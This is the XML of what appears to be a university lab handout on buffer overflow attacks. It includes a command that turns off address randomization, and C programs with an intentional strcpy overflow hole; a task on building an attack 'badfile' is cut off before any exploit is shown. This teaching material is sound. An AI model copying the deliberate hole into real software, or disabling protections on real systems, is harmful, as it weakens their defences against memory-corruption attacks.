                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21722"/>
                    <wp:lineTo x="21600" y="21722"/>
                    <wp:lineTo x="21600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85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2C944" w14:textId="5FDE770E" w:rsidR="00C46EE9" w:rsidRPr="00194DBE" w:rsidRDefault="00C46EE9" w:rsidP="00D176A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/* random.c */</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7451EFA4" w14:textId="2B0D4D14" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="00D176A0" w:rsidP="00D176A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#include &lt;stdio.h&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4F212F3E" w14:textId="39A039A1" w:rsidR="0080419D" w:rsidRPr="00194DBE" w:rsidRDefault="0080419D" w:rsidP="00D176A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#include &lt;stdlib.h&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="06635733" w14:textId="77777777" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="00D176A0" w:rsidP="00D176A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int main()</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2C14F34E" w14:textId="77777777" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="00D176A0" w:rsidP="00D176A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3AC6BE85" w14:textId="303560A9" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="00D176A0" w:rsidP="00D176A0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char </w:t>
                            </w:r>
                            <w:r w:rsidR="0080419D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x</w:t>
                            </w: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[</w:t>
                            </w:r>
                            <w:r w:rsidR="0080419D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1</w:t>
                            </w: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2];</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7587BD38" w14:textId="06528BBA" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="0080419D" w:rsidP="00D176A0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char *y</w:t>
                            </w:r>
                            <w:r w:rsidR="00D176A0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malloc(sizeof(char)*12)</w:t>
                            </w:r>
                            <w:r w:rsidR="00D176A0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373036E" w14:textId="6A376B33" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="0080419D" w:rsidP="00D176A0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printf("Address of buffer x: 0x%x\n", (unsigned int) x)</w:t>
                            </w:r>
                            <w:r w:rsidR="00D176A0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E5776FE" w14:textId="23AFA1E2" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="0080419D" w:rsidP="00D176A0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printf("Address of buffer y: 0x%x\n", (unsigned int) y)</w:t>
                            </w:r>
                            <w:r w:rsidR="00D176A0"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C7CB4A2" w14:textId="77777777" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="00D176A0" w:rsidP="00D176A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4DB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5785" id="Text Box 10" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:24.1pt;width:468pt;height:132.75pt;z-index:-251638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" fillcolor="#e7e6e6 [3214]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3852C944" w14:textId="5FDE770E" w:rsidR="00C46EE9" w:rsidRPr="00194DBE" w:rsidRDefault="00C46EE9" w:rsidP="00D176A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/* </w:t>
                      </w:r>
                      <w:proofErr w:type="spell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random.c</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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*/</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7451EFA4" w14:textId="2B0D4D14" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="00D176A0" w:rsidP="00D176A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#include &lt;</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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stdio.h</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4F212F3E" w14:textId="39A039A1" w:rsidR="0080419D" w:rsidRPr="00194DBE" w:rsidRDefault="0080419D" w:rsidP="00D176A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#include &lt;</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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stdlib.h</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="06635733" w14:textId="77777777" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="00D176A0" w:rsidP="00D176A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int </w:t>
                      </w:r>
                      <w:proofErr w:type="gram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main(</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2C14F34E" w14:textId="77777777" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="00D176A0" w:rsidP="00D176A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14:paraId="3AC6BE85" w14:textId="303560A9" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="00D176A0" w:rsidP="00D176A0">
                      <w:pPr>
                        <w:ind w:firstLine="58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char </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidR="0080419D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x</w:t>
                      </w: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[</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidR="0080419D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1</w:t>
                      </w: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2];</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7587BD38" w14:textId="06528BBA" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="0080419D" w:rsidP="00D176A0">
                      <w:pPr>
                        <w:ind w:firstLine="58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char *y</w:t>
                      </w:r>
                      <w:r w:rsidR="00D176A0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= </w:t>
                      </w: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malloc(</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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sizeof</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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(char)*12</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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</w:t>
                      </w:r>
                      <w:r w:rsidR="00D176A0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;</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                    </w:p>
                    <w:p w14:paraId="7373036E" w14:textId="6A376B33" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="0080419D" w:rsidP="00D176A0">
                      <w:pPr>
                        <w:ind w:firstLine="58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"Address of buffer x: 0x%x\n", (unsigned int) x)</w:t>
                      </w:r>
                      <w:r w:rsidR="00D176A0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;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1E5776FE" w14:textId="23AFA1E2" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="0080419D" w:rsidP="00D176A0">
                      <w:pPr>
                        <w:ind w:firstLine="58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"Address of buffer y: 0x%x\n", (unsigned int) y)</w:t>
                      </w:r>
                      <w:r w:rsidR="00D176A0"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;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1C7CB4A2" w14:textId="77777777" w:rsidR="00D176A0" w:rsidRPr="00194DBE" w:rsidRDefault="00D176A0" w:rsidP="00D176A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4DB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176A0">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>Consider</w:t>
      </w:r>
      <w:r w:rsidR="00557694">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00D176A0">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following program</w:t>
      </w:r>
      <w:r w:rsidR="00557694">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">, and compile </w:t>
      </w:r>
      <w:r w:rsidR="00557694" w:rsidRPr="00D97A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>random.c</w:t>
      </w:r>
      <w:r w:rsidR="00557694">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00557694" w:rsidRPr="00D97A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r w:rsidR="00D176A0">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="005C03C8" w:rsidRPr="00557694">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6D031B" w14:textId="40FA481F" w:rsidR="00C46EE9" w:rsidRDefault="005C03C8" w:rsidP="00C46EE9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Change the </w:t>
      </w:r>
      <w:r w:rsidR="008E4BF9">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>randomization setting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74454BA8" w14:textId="00716B25" w:rsidR="00E820A5" w:rsidRDefault="005C03C8" w:rsidP="00E820A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo sysctl -w kernel.randomize_va_space=0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD21448" w14:textId="174AFCF6" w:rsidR="005C03C8" w:rsidRDefault="005C03C8" w:rsidP="00D97A83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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Run the program </w:t>
      </w:r>
      <w:r w:rsidRPr="005C03C8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> twice. Describe your observation if the printed outputs are the same</w:t>
      </w:r>
      <w:r w:rsidR="001B3B4D">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> for these two executions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">. Explain why </w:t>
      </w:r>
      <w:r w:rsidR="00E61D68">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> happens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ED37C0" w14:textId="3843104B" w:rsidR="005C03C8" w:rsidRDefault="005C03C8" w:rsidP="005C03C8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Change the </w:t>
      </w:r>
      <w:r w:rsidR="00C55752">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>randomization setting again using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D29EDBA" w14:textId="5E085EBD" w:rsidR="005C03C8" w:rsidRDefault="005C03C8" w:rsidP="005C03C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo sysctl -w kernel.randomize_va_space=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E3D72F" w14:textId="77777777" w:rsidR="005C03C8" w:rsidRDefault="005C03C8" w:rsidP="005C03C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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Rerun the program </w:t>
      </w:r>
      <w:r w:rsidRPr="005C03C8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> twice. Describe your observation and explain why. After that, change the randomization setting using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77449E9F" w14:textId="390737C0" w:rsidR="005C03C8" w:rsidRDefault="005C03C8" w:rsidP="005C03C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo sysctl -w kernel.randomize_va_space=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F7B39A" w14:textId="77777777" w:rsidR="00C55752" w:rsidRDefault="005C03C8" w:rsidP="005C03C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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Rerun the program </w:t>
      </w:r>
      <w:r w:rsidRPr="005C03C8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> twice. Describe your observation and explain why.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D3B1F4" w14:textId="58D3C276" w:rsidR="00D97A83" w:rsidRDefault="00603268" w:rsidP="00C55752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" w:hAnsi="Tim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433CA59" wp14:editId="0308EE24">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>675005</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5943600" cy="22860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20BA5" w14:textId="41E655D6" w:rsidR="004B3953" w:rsidRPr="00524497" w:rsidRDefault="004B3953" w:rsidP="004B395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="00E13031"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stackguard</w:t>
                            </w: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.c */</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6F333A88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&lt;string.h&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1B5960CE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&lt;stdio.h&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4EE379CE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&lt;stdlib.h&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="07C4ABCE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EFFBAC1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 foo(char *str)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="53AC4B70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3D6F2EA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char buffer[12];</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3831ABB6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strcpy(buffer, str);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="64954180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CFECA47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5A2EC85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main(int argc, char *argv[])</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="36588548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7CFDE243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foo(argv[1]);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="32DE0CA4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printf("Return properly \n\n");</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0B97C36D" w14:textId="77777777" w:rsidR="00557694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return 0;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0914CB19" w14:textId="5830E9E3" w:rsidR="004B3953" w:rsidRPr="00524497" w:rsidRDefault="00557694" w:rsidP="005576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CA59" id="Text Box 4" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:53.15pt;width:468pt;height:180pt;z-index:-2516367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" fillcolor="#e7e6e6 [3214]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="18320BA5" w14:textId="41E655D6" w:rsidR="004B3953" w:rsidRPr="00524497" w:rsidRDefault="004B3953" w:rsidP="004B395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/* </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00E13031"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stackguard</w:t>
                      </w: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.c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6F333A88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string.h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1B5960CE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4EE379CE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stdlib.h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07C4ABCE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EFFBAC1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foo(</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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char *str)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="53AC4B70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13D6F2EA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char </w:t>
                      </w:r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buffer[</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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12];</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3831ABB6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strcpy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buffer, str);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="64954180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CFECA47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5A2EC85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char *</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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[])</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="36588548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7CFDE243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foo(</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/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1]);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="32DE0CA4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"Return properly \n\n");</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0B97C36D" w14:textId="77777777" w:rsidR="00557694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return </w:t>
                      </w:r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0;</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                    </w:p>
                    <w:p w14:paraId="0914CB19" w14:textId="5830E9E3" w:rsidR="004B3953" w:rsidRPr="00524497" w:rsidRDefault="00557694" w:rsidP="005576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B776D">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>Considering the following program, r</w:t>
      </w:r>
      <w:r w:rsidR="00514C03">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">un </w:t>
      </w:r>
      <w:r w:rsidR="00514C03" w:rsidRPr="003D0E56">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc </w:t>
      </w:r>
      <w:r w:rsidR="001F7880">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00514C03" w:rsidRPr="003D0E56">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>S stackguard.c</w:t>
      </w:r>
      <w:r w:rsidR="00514C03">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get</w:t>
      </w:r>
      <w:r w:rsidR="00C95A55">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> the assembly code</w:t>
      </w:r>
      <w:r w:rsidR="00514C03">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> Based on the assembly instructions in </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE5A5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>stackguard.s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>, please explain how StackGuard is implemented through compilation to defend against buffer overflow attack.</w:t>
      </w:r>
      <w:r w:rsidR="00AE5A5B">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="004C6DA0">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C55752">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C03C8">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62547780" w14:textId="4A9FEB47" w:rsidR="00F6128B" w:rsidRPr="00C338DF" w:rsidRDefault="00C338DF" w:rsidP="00EE0680">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C338DF">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Task 3: </w:t>
      </w:r>
      <w:r w:rsidR="008B4C03">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Debugging the vulnerable program and find the frame pointer </w:t>
      </w:r>
      <w:r w:rsidR="008B4C03" w:rsidRPr="008B4C03">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D5C7B3" w14:textId="6BB247A0" w:rsidR="009523B8" w:rsidRDefault="002E6068" w:rsidP="009523B8">
      <w:p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In this task, </w:t>
      </w:r>
      <w:r w:rsidR="002013D8">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">we study </w:t>
      </w:r>
      <w:r w:rsidR="007633A8">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">how </w:t>
      </w:r>
      <w:r w:rsidR="004013A1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">we can </w:t>
      </w:r>
      <w:r w:rsidR="008B7A14">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">analyze the vulnerable program and </w:t>
      </w:r>
      <w:r w:rsidR="004013A1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>find the fram</w:t>
      </w:r>
      <w:r w:rsidR="008B7A14">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="004013A1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> pointer </w:t>
      </w:r>
      <w:r w:rsidR="004013A1" w:rsidRPr="008B7A14">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:r w:rsidR="004013A1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can be used to </w:t>
      </w:r>
      <w:r w:rsidR="00404F1E">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>calculate the address of the malicious code</w:t>
      </w:r>
      <w:r w:rsidR="00045B29">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> with offset</w:t>
      </w:r>
      <w:r w:rsidR="00404F1E">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="004013A1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">construct the </w:t>
      </w:r>
      <w:r w:rsidR="004013A1" w:rsidRPr="008B7A14">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>badfile</w:t>
      </w:r>
      <w:r w:rsidR="004013A1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00045B29">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="004013A1">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> buffer overflow attack</w:t>
      </w:r>
      <w:r w:rsidR="007633A8">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5593D7E5" w14:textId="55B828AE" w:rsidR="00527847" w:rsidRDefault="003B3D30" w:rsidP="0062170E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7F73F6" wp14:editId="541BC4EE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>257810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5943600" cy="3190875"/>
                <wp:effectExtent l="0" t="0" r="19050" b="2857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90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D4AF5" w14:textId="3EA00862" w:rsidR="0002561C" w:rsidRPr="00524497" w:rsidRDefault="0002561C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="008106AE"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</w:t>
                            </w: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.c */</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="45315DDD" w14:textId="2DEC8619" w:rsidR="0002561C" w:rsidRPr="00524497" w:rsidRDefault="0002561C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&lt;stdlib.h&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="65E12FB1" w14:textId="3CB26D1A" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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&lt;stdio.h&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="241063E6" w14:textId="7BCF1D67" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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&lt;string.h&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="132A6EE2" w14:textId="77777777" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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foo(char *str)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2C61590D" w14:textId="77777777" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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CF1C563" w14:textId="2503C19B" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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char buffer[100];</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1C272323" w14:textId="1882E122" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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strcpy(buffer, str);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="70038753" w14:textId="18ADF6AC" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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return 1;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="159F5678" w14:textId="77777777" w:rsidR="00055BA1" w:rsidRPr="00524497" w:rsidRDefault="009857D7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3A803A2" w14:textId="0658BEE0" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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1EABE5B" w14:textId="7CBA52B0" w:rsidR="0002561C" w:rsidRPr="00524497" w:rsidRDefault="0002561C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main(</w:t>
                            </w:r>
                            <w:r w:rsidR="00FE3B90"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argc, char **argv</w:t>
                            </w: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5955F14" w14:textId="77777777" w:rsidR="0002561C" w:rsidRPr="00524497" w:rsidRDefault="0002561C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7E6D810A" w14:textId="315047BD" w:rsidR="0002561C" w:rsidRPr="00524497" w:rsidRDefault="00FE3B90" w:rsidP="0002561C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char str[400]</w:t>
                            </w:r>
                            <w:r w:rsidR="0002561C"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FDCF0E7" w14:textId="07347A40" w:rsidR="00FE3B90" w:rsidRPr="00524497" w:rsidRDefault="00FE3B90" w:rsidP="0002561C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FILE *badfile;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0342AC64" w14:textId="77777777" w:rsidR="001726BE" w:rsidRPr="00524497" w:rsidRDefault="001726BE" w:rsidP="0002561C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40FC800" w14:textId="0C53E8F1" w:rsidR="00130240" w:rsidRPr="00524497" w:rsidRDefault="00130240" w:rsidP="0002561C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badfile = fopen("badfile", "r");</w:t>
                            </w:r>
                          </w:p>
